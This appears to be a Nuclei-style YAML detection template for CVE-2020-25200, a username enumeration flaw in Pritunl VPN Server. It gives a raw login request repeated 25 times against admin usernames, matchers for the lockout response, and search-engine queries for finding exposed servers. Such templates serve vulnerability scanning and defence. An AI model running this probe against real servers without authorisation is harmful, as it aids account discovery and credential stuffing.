id: CVE-2020-25200 info: name: Pritunl VPN Server 1.29.2145.25 - Username Enumeration author: pussycat0x severity: medium description: | Pritunl 1.29.2145.25 contains a username enumeration issue caused by different error responses in /auth/session login attempts, letting attackers verify valid usernames, exploit requires network access to the login endpoint. impact: | Attackers can enumerate valid VPN usernames, potentially aiding targeted attacks or credential stuffing efforts. remediation: | Implement uniform error responses for login attempts to prevent username enumeration. reference: - https://github.com/lukaszstu/pritunl-CVE-2020-25200/blob/master/CVE-2020-25200 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-25200 cwe-id: CWE-203 epss-score: 0.72966 epss-percentile: 0.98802 cpe: cpe:2.3:a:pritunl:pritunl:1.29.2145.25:*:*:*:*:*:*:* metadata: verified: true max-request: 25 vendor: pritunl product: pritunl shodan-query: http.title:"pritunl" fofa-query: title="pritunl" google-query: intitle:"pritunl" tags: cve,cve2020,pritunl,vpn,enum http: - raw: - | POST /auth/session HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Origin: {{RootURL}} Referer: {{RootURL}}/login {"username":"{{username}}","password":"{{rand_int(10000,99999)}}"} attack: pitchfork payloads: username: - "pritunl" - "admin" attempt: - "1" - "2" - "3" - "4" - "5" - "6" - "7" - "8" - "9" - "10" - "11" - "12" - "13" - "14" - "15" - "16" - "17" - "18" - "19" - "20" - "21" - "22" - "23" - "24" - "25" stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - 'status_code == 400' - 'contains_any(body, "Too many authentication attempts", "auth_too_many")' - 'contains(header, "application/json")' condition: and # digest: 4b0a00483046022100b941edcd338d87574e7937dd170158b336df47814a84c1406d16245b8418f0fd02210090852b3f2a5ceb5c4f53e29c0f04a9b50c7c953dc8e7a7c7d5233964a3fa0366:922c64590222798bb761d5b6d8e72950